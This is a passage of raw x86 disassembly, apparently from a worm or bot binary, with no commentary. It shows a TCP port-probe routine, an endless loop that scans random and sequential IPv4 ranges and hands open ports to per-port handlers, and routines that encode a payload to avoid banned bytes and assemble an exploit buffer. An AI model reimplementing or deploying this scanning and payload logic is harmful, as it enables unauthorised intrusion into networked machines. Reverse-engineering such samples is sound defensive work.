; ---------------------------------------------------------------------------
loc_41375E: ; CODE XREF: sub_4134A7+29D�j
or edx, esi
loc_413760: ; CODE XREF: sub_4134A7+295�j
; sub_4134A7+2A9�j ...
and eax, ebx
sub eax, 40h
jz short loc_413783
sub eax, 7FC0h
jz short loc_41377B
sub eax, 40h
jnz short loc_413789
or edx, 1000000h
jmp short loc_413789
; ---------------------------------------------------------------------------
loc_41377B: ; CODE XREF: sub_4134A7+2C5�j
or edx, 3000000h
jmp short loc_413789
; ---------------------------------------------------------------------------
loc_413783: ; CODE XREF: sub_4134A7+2BE�j
or edx, 2000000h
loc_413789: ; CODE XREF: sub_4134A7+2CA�j
; sub_4134A7+2D2�j ...
mov eax, edx
loc_41378B: ; CODE XREF: sub_4134A7+234�j
mov ecx, [esp+20h+var_4]
mov edx, eax
xor edx, ecx
or eax, ecx
test edx, 8031Fh
jz short loc_4137A2
or eax, 80000000h
loc_4137A2: ; CODE XREF: sub_4134A7+16F�j
; sub_4134A7+2F4�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 10h
retn
sub_4134A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4137AA proc near ; CODE XREF: sub_4123ED+326�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
push ebx
push esi
xor esi, esi
cmp [ebp+arg_4], esi
push edi
mov [ebp+var_18], 404Eh
mov [eax], esi
mov [eax+4], esi
mov [eax+8], esi
jbe loc_413920
loc_4137DA: ; CODE XREF: sub_4137AA+146�j
mov edx, [eax]
mov ebx, [eax+4]
mov esi, eax
lea edi, [ebp+var_10]
movsd
movsd
movsd
mov ecx, edx
shr ecx, 1Fh
lea edi, [edx+edx]
lea edx, [ebx+ebx]
or edx, ecx
mov ecx, [eax+8]
mov esi, ebx
shr esi, 1Fh
add ecx, ecx
or ecx, esi
mov [ebp+var_14], edi
mov esi, edi
and [ebp+var_14], 0
mov ebx, edx
shr ebx, 1Fh
add ecx, ecx
shr edi, 1Fh
or ecx, ebx
mov ebx, [ebp+var_10]
add esi, esi
add edx, edx
or edx, edi
lea edi, [esi+ebx]
cmp edi, esi
mov [eax], esi
mov [eax+4], edx
mov [eax+8], ecx
jb short loc_413831
cmp edi, ebx
jnb short loc_413838
loc_413831: ; CODE XREF: sub_4137AA+81�j
mov [ebp+var_14], 1
loc_413838: ; CODE XREF: sub_4137AA+85�j
xor ebx, ebx
cmp [ebp+var_14], ebx
mov [eax], edi
jz short loc_41385B
lea esi, [edx+1]
cmp esi, edx
jb short loc_41384D
cmp esi, 1
jnb short loc_413850
loc_41384D: ; CODE XREF: sub_4137AA+9C�j
xor ebx, ebx
inc ebx
loc_413850: ; CODE XREF: sub_4137AA+A1�j
test ebx, ebx
mov [eax+4], esi
jz short loc_41385B
inc ecx
mov [eax+8], ecx
loc_41385B: ; CODE XREF: sub_4137AA+95�j
; sub_4137AA+AB�j
mov ecx, [eax+4]
mov edx, [ebp+var_C]
lea ebx, [ecx+edx]
xor esi, esi
cmp ebx, ecx
jb short loc_41386E
cmp ebx, edx
jnb short loc_413871
loc_41386E: ; CODE XREF: sub_4137AA+BE�j
xor esi, esi
inc esi
loc_413871: ; CODE XREF: sub_4137AA+C2�j
test esi, esi
mov [eax+4], ebx
jz short loc_41387B
inc dword ptr [eax+8]
loc_41387B: ; CODE XREF: sub_4137AA+CC�j
mov ecx, [ebp+var_8]
add [eax+8], ecx
and [ebp+var_14], 0
lea ecx, [edi+edi]
mov edx, edi
shr edx, 1Fh
lea edi, [ebx+ebx]
or edi, edx
mov edx, [eax+8]
mov esi, ebx
shr esi, 1Fh
lea ebx, [edx+edx]
mov edx, [ebp+arg_0]
or ebx, esi
mov [eax], ecx
mov [eax+4], edi
mov [eax+8], ebx
movsx edx, byte ptr [edx]
lea esi, [ecx+edx]
cmp esi, ecx
mov [ebp+var_10], edx
jb short loc_4138BB
cmp esi, edx
jnb short loc_4138C2
loc_4138BB: ; CODE XREF: sub_4137AA+10B�j
mov [ebp+var_14], 1
loc_4138C2: ; CODE XREF: sub_4137AA+10F�j
cmp [ebp+var_14], 0
mov [eax], esi
jz short loc_4138E6
lea ecx, [edi+1]
xor edx, edx
cmp ecx, edi
jb short loc_4138D8
cmp ecx, 1
jnb short loc_4138DB
loc_4138D8: ; CODE XREF: sub_4137AA+127�j
xor edx, edx
inc edx
loc_4138DB: ; CODE XREF: sub_4137AA+12C�j
test edx, edx
mov [eax+4], ecx
jz short loc_4138E6
inc ebx
mov [eax+8], ebx
loc_4138E6: ; CODE XREF: sub_4137AA+11E�j
; sub_4137AA+136�j
dec [ebp+arg_4]
inc [ebp+arg_0]
cmp [ebp+arg_4], 0
ja loc_4137DA
xor esi, esi
jmp short loc_413920
; ---------------------------------------------------------------------------
loc_4138FA: ; CODE XREF: sub_4137AA+179�j
mov ecx, [eax+4]
mov edx, ecx
shr edx, 10h
mov [eax+8], edx
mov edx, [eax]
mov edi, edx
shl ecx, 10h
shr edi, 10h
or ecx, edi
shl edx, 10h
add [ebp+var_18], 0FFF0h
mov [eax+4], ecx
mov [eax], edx
loc_413920: ; CODE XREF: sub_4137AA+2A�j
; sub_4137AA+14E�j
cmp [eax+8], esi
jz short loc_4138FA
mov ebx, 8000h
test [eax+8], ebx
jnz short loc_41395F
loc_41392F: ; CODE XREF: sub_4137AA+1B3�j
mov esi, [eax]
mov edi, [eax+4]
add [ebp+var_18], 0FFFFh
mov ecx, esi
add esi, esi
shr ecx, 1Fh
mov [eax], esi
lea esi, [edi+edi]
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
shr edx, 1Fh
add ecx, ecx
or ecx, edx
test ecx, ebx
mov [eax+4], esi
mov [eax+8], ecx
jz short loc_41392F
loc_41395F: ; CODE XREF: sub_4137AA+183�j
mov cx, word ptr [ebp+var_18]
mov [eax+0Ah], cx
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4137AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_413976 proc near ; CODE XREF: sub_40423C+24�p
; sub_4086EA+10�p ...
jmp ds:dword_41D1B0
sub_413976 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41397C proc near ; CODE XREF: J8@F_7_S:00413B78�p
; J8@F_7_S:00413C9E�p ...
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 128h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
xor edi, edi
push 6
inc edi
push edi
push 2
mov [ebp+var_18], edi
call ds:dword_41D27C
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4139AD
xor al, al
jmp short loc_413A1F
; ---------------------------------------------------------------------------
loc_4139AD: ; CODE XREF: sub_41397C+2B�j
push [ebp+arg_4]
call ds:dword_41D278
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push esi
mov [ebp+var_14], 2
call ds:dword_41D268
and [ebp+var_1C], 0
push 10h
lea eax, [ebp+var_14]
push eax
push esi
mov [ebp+var_20], 5
mov [ebp+var_124], esi
mov [ebp+var_128], edi
call ds:dword_41D240
lea eax, [ebp+var_20]
push eax
push 0
lea eax, [ebp+var_128]
push eax
push 0
push 0
call ds:dword_41D258
push esi
mov edi, eax
call ds:dword_41D224
test edi, edi
setnle al
loc_413A1F: ; CODE XREF: sub_41397C+2F�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_41397C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 25Ch
mov eax, ds:dword_423064
xor eax, esp
mov [esp+258h], eax
push ebx
push esi
mov esi, [ebp+8]
push edi
push 49h
pop ecx
lea edi, [esp+138h]
rep movsd
loc_413A59: ; CODE XREF: J8@F_7_S:00413F71�j
; J8@F_7_S:00413F82�j
lea eax, [esp+18h]
push eax
lea eax, [esp+18h]
push eax
lea eax, [esp+18h]
push eax
lea eax, [esp+18h]
push eax
or edi, 0FFFFFFFFh
lea eax, [esp+248h]
push offset dword_41EEFC
push eax
mov [esp+24h], edi
mov [esp+28h], edi
mov [esp+2Ch], edi
mov [esp+30h], edi
call sub_4035E4
add esp, 18h
cmp byte ptr [esp+24Ah], 0
jz short loc_413AE7
cmp [esp+0Ch], edi
mov esi, 0FEh
jnz short loc_413AB7
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+0Ch], eax
loc_413AB7: ; CODE XREF: J8@F_7_S:00413AA8�j
cmp [esp+10h], edi
jnz short loc_413ACA
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+10h], eax
loc_413ACA: ; CODE XREF: J8@F_7_S:00413ABB�j
cmp [esp+14h], edi
jnz short loc_413ADD
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+14h], eax
loc_413ADD: ; CODE XREF: J8@F_7_S:00413ACE�j
mov eax, [esp+18h]
cmp eax, edi
jnz short loc_413B39
jmp short loc_413B12
; ---------------------------------------------------------------------------
loc_413AE7: ; CODE XREF: J8@F_7_S:00413A9D�j
mov eax, [esp+250h]
sub eax, 0
jz short loc_413B21
dec eax
jz short loc_413B00
dec eax
jnz short loc_413B35
mov eax, 0FEh
jmp short loc_413B14
; ---------------------------------------------------------------------------
loc_413B00: ; CODE XREF: J8@F_7_S:00413AF4�j
mov esi, 0FEh
loc_413B05: ; CODE XREF: J8@F_7_S:00413B33�j
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+14h], eax
loc_413B12: ; CODE XREF: J8@F_7_S:00413AE5�j
mov eax, esi
loc_413B14: ; CODE XREF: J8@F_7_S:00413AFE�j
xor ebx, ebx
call sub_4192C7
mov [esp+18h], eax
jmp short loc_413B39
; ---------------------------------------------------------------------------
loc_413B21: ; CODE XREF: J8@F_7_S:00413AF1�j
mov esi, 0FEh
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+10h], eax
jmp short loc_413B05
; ---------------------------------------------------------------------------
loc_413B35: ; CODE XREF: J8@F_7_S:00413AF7�j
mov eax, [esp+18h]
loc_413B39: ; CODE XREF: J8@F_7_S:00413AE3�j
; J8@F_7_S:00413B1F�j
shl eax, 8
add eax, [esp+14h]
shl eax, 8
add eax, [esp+10h]
shl eax, 8
add eax, [esp+0Ch]
mov [esp+254h], eax
mov eax, [esp+24Ch]
cmp eax, edi
jnz loc_413D78
xor ebx, ebx
mov [esp+20h], ebx
mov eax, offset dword_424548
loc_413B6F: ; CODE XREF: J8@F_7_S:00413B96�j
push dword ptr [eax]
push dword ptr [esp+258h]
call sub_41397C
test al, al
pop ecx
pop ecx
jnz short loc_413B9D
inc ebx
mov eax, ebx
imul eax, 2Ch
lea eax, dword_424548[eax]
cmp dword ptr [eax], 0
mov [esp+20h], ebx
jnz short loc_413B6F
jmp loc_413F62
; ---------------------------------------------------------------------------
loc_413B9D: ; CODE XREF: J8@F_7_S:00413B81�j
push 110h
lea eax, [esp+2Ch]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+138h]
push eax
push offset byte_41EF08
lea eax, [esp+30h]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+38h]
add esp, 10h
lea esi, [eax+1]
loc_413BD7: ; CODE XREF: J8@F_7_S:00413BDC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413BD7
sub eax, esi
mov [esp+eax+28h], cl
mov eax, [esp+254h]
mov [esp+128h], ebx
imul ebx, 2Ch
mov [esp+12Ch], eax
mov eax, ds:dword_424548[ebx]
mov [esp+130h], eax
mov al, [esp+248h]
sub esp, 110h
mov [esp+244h], al
mov al, [esp+35Ah]
push 44h
pop ecx
mov [esp+245h], al
lea esi, [esp+138h]
mov edi, esp
rep movsd
call ds:off_424550[ebx]
mov esi, [esp+128h]
shl esi, 8
add esi, [esp+124h]
add esp, 110h
shl esi, 8
add esi, [esp+10h]
mov dword ptr [esp+1Ch], 100h
shl esi, 8
add esi, [esp+0Ch]
mov [esp+24h], esi
loc_413C70: ; CODE XREF: J8@F_7_S:00413D6D�j
mov eax, [esp+1Ch]
mov ecx, [esp+14h]
add eax, ecx
shl eax, 8
add eax, [esp+10h]
shl eax, 8
add eax, [esp+0Ch]
cmp eax, esi
mov [esp+254h], eax
jz loc_413D5D
push ds:dword_424548[ebx]
push eax
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413D5D
push 110h
lea eax, [esp+2Ch]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+138h]
push eax
push offset byte_41EF0C
lea eax, [esp+30h]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+38h]
add esp, 10h
lea esi, [eax+1]
loc_413CE7: ; CODE XREF: J8@F_7_S:00413CEC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413CE7
sub eax, esi
mov [esp+eax+28h], cl
mov eax, [esp+254h]
mov [esp+12Ch], eax
mov eax, [esp+20h]
mov [esp+128h], eax
mov eax, ds:dword_424548[ebx]
mov [esp+130h], eax
mov al, [esp+248h]
sub esp, 110h
mov [esp+244h], al
mov al, [esp+35Ah]
push 44h
pop ecx
mov [esp+245h], al
lea esi, [esp+138h]
mov edi, esp
rep movsd
call ds:off_424550[ebx]
mov esi, [esp+134h]
add esp, 110h
loc_413D5D: ; CODE XREF: J8@F_7_S:00413C91�j
; J8@F_7_S:00413CA7�j
add dword ptr [esp+1Ch], 100h
cmp dword ptr [esp+1Ch], 0FE00h
jle loc_413C70
jmp loc_413F5D
; ---------------------------------------------------------------------------
loc_413D78: ; CODE XREF: J8@F_7_S:00413B5E�j
imul eax, 2Ch
push ds:dword_424548[eax]
push dword ptr [esp+258h]
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413F62
push 110h
lea eax, [esp+2Ch]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+138h]
push eax
push offset dword_41EF10
lea eax, [esp+30h]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+38h]
add esp, 10h
lea ecx, [eax+1]
loc_413DD1: ; CODE XREF: J8@F_7_S:00413DD6�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_413DD1
sub eax, ecx
mov [esp+eax+28h], dl
mov eax, [esp+254h]
mov [esp+12Ch], eax
mov eax, [esp+24Ch]
mov [esp+128h], eax
imul eax, 2Ch
mov ecx, ds:dword_424548[eax]
mov [esp+130h], ecx
mov cl, [esp+248h]
sub esp, 110h
mov [esp+244h], cl
push 44h
pop ecx
lea esi, [esp+138h]
mov edi, esp
rep movsd
call ds:off_424550[eax]
mov ebx, [esp+128h]
shl ebx, 8
add ebx, [esp+124h]
add esp, 110h
shl ebx, 8
add ebx, [esp+10h]
mov dword ptr [esp+1Ch], 100h
shl ebx, 8
add ebx, [esp+0Ch]
loc_413E5F: ; CODE XREF: J8@F_7_S:00413F57�j
mov eax, [esp+1Ch]
mov ecx, [esp+14h]
add eax, ecx
shl eax, 8
add eax, [esp+10h]
shl eax, 8
add eax, [esp+0Ch]
cmp eax, ebx
mov [esp+254h], eax
jz loc_413F47
mov ecx, [esp+24Ch]
imul ecx, 2Ch
push ds:dword_424548[ecx]
push eax
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413F47
push 110h
lea eax, [esp+2Ch]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+138h]
push eax
push offset byte_41EF14
lea eax, [esp+30h]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+38h]
add esp, 10h
lea esi, [eax+1]
loc_413EE0: ; CODE XREF: J8@F_7_S:00413EE5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413EE0
sub eax, esi
mov [esp+eax+28h], cl
mov eax, [esp+254h]
mov [esp+12Ch], eax
mov eax, [esp+24Ch]
mov [esp+128h], eax
imul eax, 2Ch
mov ecx, ds:dword_424548[eax]
mov [esp+130h], ecx
mov cl, [esp+248h]
sub esp, 110h
mov [esp+244h], cl
push 44h
pop ecx
lea esi, [esp+138h]
mov edi, esp
rep movsd
call ds:off_424550[eax]
add esp, 110h
loc_413F47: ; CODE XREF: J8@F_7_S:00413E80�j
; J8@F_7_S:00413EA0�j
add dword ptr [esp+1Ch], 100h
cmp dword ptr [esp+1Ch], 0FE00h
jle loc_413E5F
loc_413F5D: ; CODE XREF: J8@F_7_S:00413D73�j
call sub_4192FB
loc_413F62: ; CODE XREF: J8@F_7_S:00413B98�j
; J8@F_7_S:00413D91�j
push 64h
call ds:dword_41D0FC
cmp ds:byte_4269C0, 0
jnz loc_413A59
push 2710h
call ds:dword_41D0FC
jmp loc_413A59
; ---------------------------------------------------------------------------
cmp dword ptr [eax+4], 0
setnz al
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F8F proc near ; CODE XREF: sub_414023+12�p
; sub_414042+5D�p
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
and dword ptr [ebx+4], 0
mov eax, ds:dword_433C4C
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, offset dword_433C48
push esi
push edi
mov [ebp+var_8], eax
mov [ebp+var_10], eax
loc_413FB0: ; CODE XREF: sub_413F8F+4C�j
mov eax, ds:dword_433C4C
lea edi, [ebp+var_10]
lea esi, [ebp+var_8]
mov [ebp+var_C], eax
call sub_40166F
test al, al
jz short loc_414018
call sub_40164F
mov ecx, [ebx]
cmp ecx, [eax+40h]
lea edi, [ebp+var_18]
jz short loc_413FDD
call sub_40168C
jmp short loc_413FB0
; ---------------------------------------------------------------------------
loc_413FDD: ; CODE XREF: sub_413F8F+45�j
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
lea esi, [ebp+var_10]
mov [ebp+var_C], eax
call sub_40168C
mov eax, [eax+4]
cmp eax, ds:dword_433C4C
jz short loc_414018
mov ecx, [eax+4]
mov edx, [eax]
mov [ecx], edx
mov ecx, [eax]
mov edx, [eax+4]
push eax
mov [ecx+4], edx
call sub_402F6D
dec ds:dword_433C50
pop ecx
loc_414018: ; CODE XREF: sub_413F8F+36�j
; sub_413F8F+6B�j
push ebx
call sub_402F6D
pop ecx
pop edi
pop esi
leave
retn
sub_413F8F endp
; =============== S U B R O U T I N E =======================================
sub_414023 proc near ; CODE XREF: sub_40243A+7C�p
; sub_419477+10B�p
push ebx
mov ebx, eax
push 0
push dword ptr [ebx+4]
call ds:dword_41D094
test eax, eax
jz short loc_41403E
call sub_413F8F
mov al, 1
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41403E: ; CODE XREF: sub_414023+10�j
xor al, al
pop ebx
retn
sub_414023 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414042 proc near ; CODE XREF: sub_419EA0+4D2�p
; J8@F_7_S:0041BB65�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 1Ch
mov eax, ds:dword_433C4C
mov eax, [eax]
push ebx
mov [esp+20h+var_14], eax
mov eax, offset dword_433C48
push esi
push edi
mov [esp+28h+var_18], eax
mov [esp+28h+var_10], eax
loc_414066: ; CODE XREF: sub_414042+54�j
mov eax, ds:dword_433C4C
lea edi, [esp+28h+var_10]
lea esi, [esp+28h+var_18]
mov [esp+28h+var_C], eax
call sub_40166F
test al, al
jz short loc_4140A4
call sub_40164F
mov ecx, [ebp+arg_0]
cmp ecx, [eax+40h]
jz short loc_414098
lea edi, [esp+28h+var_8]
call sub_40168C
jmp short loc_414066
; ---------------------------------------------------------------------------
loc_414098: ; CODE XREF: sub_414042+49�j
call sub_40164F
mov ebx, [eax]
call sub_413F8F
loc_4140A4: ; CODE XREF: sub_414042+3C�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_414042 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4140AB proc near ; CODE XREF: sub_40177B+246�p
; sub_4019F3+1F8�p ...
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 54h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push esi
push 0
push ecx
push eax
push 0
push 0
call ds:dword_41D110
test eax, eax
mov [esi+4], eax
jz short loc_414104
push edi
lea eax, [ebp+var_4B]
push 38h
push eax
call sub_402AEE
mov eax, [esi]
add esp, 0Ch
mov [ebp+var_10], eax
mov eax, ds:dword_433C4C
push eax
mov ecx, offset dword_433C48
push ecx
lea eax, [ebp+var_50]
push eax
mov [ebp+var_4C], 0
mov [ebp+var_50], esi
call sub_4016BA
loc_414104: ; CODE XREF: sub_4140AB+27�j
push 1
push dword ptr [esi+4]
call ds:dword_41D07C
mov ecx, [ebp+var_4]
xor ecx, ebp
mov eax, esi
call sub_402710
leave
retn 4
sub_4140AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41411F proc near ; CODE XREF: sub_41A5C1+1C7�p
; sub_41A5C1+1E1�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 1
push esi
push edi
mov [ebp+var_2], 1
mov [ebp+var_1], 0
jnz loc_414239
mov eax, [ebp+arg_8]
lea esi, [eax+18h]
and eax, 80000001h
mov [ebp+var_8], esi
jns short loc_41414E
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_41414E: ; CODE XREF: sub_41411F+28�j
jz short loc_414154
mov [ebp+var_1], 1
loc_414154: ; CODE XREF: sub_41411F:loc_41414E�j
mov eax, 172h
cmp esi, eax
jle short loc_414167
cmp [ebp+var_1], 1
jnz loc_414324
loc_414167: ; CODE XREF: sub_41411F+3C�j
lea ecx, [esi+1]
cmp ecx, eax
mov [ebp+var_C], ecx
jle short loc_414181
cmp [ebp+var_1], 1
jnz short loc_414181
jmp loc_414324
; ---------------------------------------------------------------------------
loc_41417C: ; CODE XREF: sub_41411F+ED�j
mov eax, 172h
loc_414181: ; CODE XREF: sub_41411F+50�j
; sub_41411F+56�j
inc [ebp+var_2]
and [ebp+arg_0], 0
push eax
push 0
push ebx
call sub_407B70
add esp, 0Ch
push 6
pop ecx
mov esi, offset dword_424894
mov edi, ebx
rep movsd
mov cl, [ebp+var_2]
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebx+0Eh], cl
mov [ebx+12h], cl
jle short loc_4141C8
loc_4141B0: ; CODE XREF: sub_41411F+A7�j
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov al, [esi+eax]
add al, cl
mov [ebx+esi+18h], al
inc esi
cmp esi, [ebp+arg_8]
mov [ebp+arg_0], esi
jl short loc_4141B0
loc_4141C8: ; CODE XREF: sub_41411F+8F�j
cmp [ebp+var_1], 1
jnz short loc_4141D5
mov eax, [ebp+arg_0]
mov [eax+ebx+18h], cl
loc_4141D5: ; CODE XREF: sub_41411F+AD�j
cmp [ebp+var_8], edi
mov byte ptr [ebp+arg_0+3], 1
jle short loc_414217
loc_4141DE: ; CODE XREF: sub_41411F+E2�j
mov dl, [edi+ebx]
xor esi, esi
loc_4141E3: ; CODE XREF: sub_41411F+D0�j
mov eax, [ebp+arg_C]
cmp dl, [esi+eax]
jz short loc_4141F3
inc esi
cmp esi, 8
jl short loc_4141E3
jmp short loc_4141F7
; ---------------------------------------------------------------------------
loc_4141F3: ; CODE XREF: sub_41411F+CA�j
mov byte ptr [ebp+arg_0+3], 0
loc_4141F7: ; CODE XREF: sub_41411F+D2�j
cmp byte ptr [ebp+arg_0+3], 0
jz short loc_414203
inc edi
cmp edi, [ebp+var_8]
jl short loc_4141DE
loc_414203: ; CODE XREF: sub_41411F+DC�j
cmp byte ptr [ebp+arg_0+3], 1
jz short loc_414217
cmp cl, 0FFh
jb loc_41417C
jmp loc_414324
; ---------------------------------------------------------------------------
loc_414217: ; CODE XREF: sub_41411F+BD�j
; sub_41411F+E8�j ...
cmp [ebp+var_1], 1
jnz short loc_414226
mov eax, [ebp+var_C]
inc [ebp+arg_8]
mov [ebp+var_8], eax
loc_414226: ; CODE XREF: sub_41411F+FC�j
mov eax, [ebp+arg_8]
cdq
sub eax, edx
sar eax, 1
mov [ebx+3], al
mov eax, [ebp+var_8]
jmp loc_414326
; ---------------------------------------------------------------------------
loc_414239: ; CODE XREF: sub_41411F+14�j
cmp [ebp+arg_0], 2
jnz loc_414324
mov eax, [ebp+arg_8]
lea esi, [eax+18h]
and eax, 80000001h
mov [ebp+var_8], esi
jns short loc_414258
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_414258: ; CODE XREF: sub_41411F+132�j
jz short loc_41425E
mov [ebp+var_1], 1
loc_41425E: ; CODE XREF: sub_41411F:loc_414258�j
mov eax, 172h
cmp esi, eax
jle short loc_414271
cmp [ebp+var_1], 1
jnz loc_414324
loc_414271: ; CODE XREF: sub_41411F+146�j
lea ecx, [esi+1]
cmp ecx, eax
mov [ebp+var_C], ecx
jle short loc_41428B
cmp [ebp+var_1], 1
jnz short loc_41428B
jmp loc_414324
; ---------------------------------------------------------------------------
loc_414286: ; CODE XREF: sub_41411F+1FF�j
mov eax, 172h
loc_41428B: ; CODE XREF: sub_41411F+15A�j
; sub_41411F+160�j
inc [ebp+var_2]
and [ebp+arg_0], 0
push eax
push 0
push ebx
call sub_407B70
add esp, 0Ch
push 6
pop ecx
mov esi, offset dword_4248B0
mov edi, ebx
rep movsd
mov cl, [ebp+var_2]
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebx+0Eh], cl
mov [ebx+12h], cl
jle short loc_4142D2
loc_4142BA: ; CODE XREF: sub_41411F+1B1�j
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov al, [esi+eax]
xor al, cl
mov [ebx+esi+18h], al
inc esi
cmp esi, [ebp+arg_8]
mov [ebp+arg_0], esi
jl short loc_4142BA
loc_4142D2: ; CODE XREF: sub_41411F+199�j
cmp [ebp+var_1], 1
jnz short loc_4142DF
mov eax, [ebp+arg_0]
mov [eax+ebx+18h], cl
loc_4142DF: ; CODE XREF: sub_41411F+1B7�j
cmp [ebp+var_8], edi
mov byte ptr [ebp+arg_0+3], 1
jle loc_414217
loc_4142EC: ; CODE XREF: sub_41411F+1F0�j
mov dl, [edi+ebx]
xor esi, esi
loc_4142F1: ; CODE XREF: sub_41411F+1DE�j
mov eax, [ebp+arg_C]
cmp dl, [esi+eax]
jz short loc_414301
inc esi
cmp esi, 8
jl short loc_4142F1
jmp short loc_414305
; ---------------------------------------------------------------------------
loc_414301: ; CODE XREF: sub_41411F+1D8�j
mov byte ptr [ebp+arg_0+3], 0
loc_414305: ; CODE XREF: sub_41411F+1E0�j
cmp byte ptr [ebp+arg_0+3], 0
jz short loc_414311
inc edi
cmp edi, [ebp+var_8]
jl short loc_4142EC
loc_414311: ; CODE XREF: sub_41411F+1EA�j
cmp byte ptr [ebp+arg_0+3], 1
jz loc_414217
cmp cl, 0FFh
jb loc_414286
loc_414324: ; CODE XREF: sub_41411F+42�j
; sub_41411F+58�j ...
xor eax, eax
loc_414326: ; CODE XREF: sub_41411F+115�j
pop edi
pop esi
leave
retn
sub_41411F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41432A proc near ; CODE XREF: sub_41A5C1+19F�p
; sub_41A9DE+490�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
lea edx, [eax+1]
loc_414333: ; CODE XREF: sub_41432A+E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_414333
sub eax, edx
push ebx
lea ebx, [eax+0CCh]
cmp ebx, 172h
jg short loc_414393
push esi
push edi
mov edi, [ebp+arg_0]
push ebx
push 0
push edi
call sub_407B70
mov eax, [ebp+arg_4]
add esp, 0Ch
push 32h
pop ecx
mov esi, offset dword_4248D0
rep movsd
movsw
movsb
lea esi, [eax+1]
loc_41436F: ; CODE XREF: sub_41432A+4A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41436F
sub eax, esi
push eax
mov eax, [ebp+arg_0]
push [ebp+arg_4]
add eax, 0CAh
push eax
call sub_407BF0
add esp, 0Ch
pop edi
mov eax, ebx
pop esi
jmp short loc_414395
; ---------------------------------------------------------------------------
loc_414393: ; CODE XREF: sub_41432A+1F�j
xor eax, eax
loc_414395: ; CODE XREF: sub_41432A+67�j
pop ebx
pop ebp
retn
sub_41432A endp
; ---------------------------------------------------------------------------
align 10h
